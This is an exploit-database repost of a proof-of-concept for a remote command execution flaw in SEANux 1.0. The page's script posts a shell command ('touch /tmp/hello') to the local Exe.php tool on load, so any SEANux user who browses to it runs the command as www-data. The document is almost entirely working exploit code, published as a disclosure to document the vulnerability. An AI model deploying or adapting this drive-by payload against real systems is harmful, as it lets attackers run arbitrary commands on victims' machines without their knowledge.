###########################

# SEANux 1.0 Remote Command Execution vulnerability

###########################

<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/
Larry W. Cashdollar
@_larry0
2/9/2015
Browse to this page using any browser in SEANux v1.0 to execute commands as www-data.
--!>

<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<script>
$(document).ready(function(){
$.post("http://localhost/tools/Exe.php",
{
cmd: "touch /tmp/hello",
execute: "Execute"
},
function(data,status){
alert("Data: " + data + "\nResult: " + status);
});
});
</script>
</head>
<body>
<h2>
Hello! You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation.
</h2>
<hr>
<br>
<a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a>
</body>
</html>

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-02-12]

###########################